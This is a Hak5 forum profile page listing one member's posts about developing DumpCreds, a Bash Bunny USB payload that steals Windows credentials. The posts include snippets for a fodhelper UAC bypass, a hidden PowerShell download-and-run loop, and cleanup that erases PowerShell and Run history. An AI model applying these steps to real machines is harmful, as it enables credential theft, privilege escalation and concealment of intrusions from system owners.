Jump to content

qdba

Active Members
  • Content Count

    87
  • Joined

  • Last visited

  • Days Won

    2

About qdba

  • Rank
    Hak5 Fan ++

Profile Information

  • Gender
    Male
  • Location
    Stuttgart
  • Interests
    IT-Security, Linux, Programming Languages

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Maybe an VirusScanner lazagne.exe was mostly catched by AV.
  2. Add multiple UAC Modes set variable UAC_MODE in payload.txt UAC_MODE=1 # Fodhelper UAC UAC_MODE=0 # Standard UAC Mode Just Beta ( Works on my Windows 10 - Not tested on 7 yet)
  3. OK.... Some new changes (Beta State) Better Cleanup - remove all changes in Powershell History - remove all changes in Run MRU (not only delete te files) https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds
  4. I must check, if the command for switching of the history is still in the history file after execution. Can't do it now. Have no powershell here. The result give me the route foe the rest.
  5. It cannot be done in the line with the main.ps1 call because...... ....... A 1 first Powershell task will be started fo the input of the registry command for UAC Baypass. Than the fodhelper opens a second Powershell task in Admin mode. The first Powershell task can be closed after the fodhelper thing The string Q STRING "powershell -exec bypass -W HIDDEN \"while (1) { If (Test-Connection 172........ will be "quacked" in the second PS Task. A third PS Task ist opening, waiting for HTTP Server is coming up and downloads the main.ps1. The second task is closed with the
  6. Got it ... With Set-PSReadlineOption –HistorySaveStyle SaveNothing the History saving in Powershell will be switched off. So I set it at the beginning of the Script and delete the History File at the end
  7. Q GUI didn't work for me. Q GUI r does. Now we have only the taskkill powershell command in the powershell history.
  8. Code for clearing "Run" history was already in main.ps1 ......... # Epmty Run Input Field Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentContinue ........ Added the code to clear Powwershell history to main.ps1 We should avoid too much "Q GUI r" commands. because it's visible.
  9. Updated the repo so hak5 could merge it to the master branch Changed Version to 2.3 Add taskill /F /IM powershell.exe at the end of main.ps1
  10. I merged your path to the master branch. Did some patches so fodhelper starts hidden. https://github.com/qdba/bashbunny-payloads/blob/master/payloads/library/credentials/DumpCreds/payload.txt
  11. @PoSHMagiC0de Thank you for your opinion and suggestion. I give you 100% , writing scripts in Function format is not so bad. But... ... When I start writing DumpCreds and other scripts for BB I didn't do anything before with powershell. Not even a "Hello World" . So I'm fighting a lot with the powershell syntax and some effects I did not expect. - output Lines are truncated - piping directly to a file on BB's smbserver.py did not work - when I piping the output to variables CRs and LFs are vanished - No idea how to start functions in Background I'm CIO and CSIO at 3 dif
  12. 1. Do you set the IP of the Remote NDIS Driver on your Computer manually or have you enabled ICS sharing? The command GET TARGET_IP does onliy work if your Remote NDIS Driver is set to DHCP 2. If you have Admin rights at your computer (the UAC is working) the script is set to AdminMode=True. If your have no Admin rights it doesn't make sense to run mimikatz or hashdump because tis works only if you have Admin rights. So AdminMode shows only if you have admin rights ($true) or not (false).
×
×
  • Create New...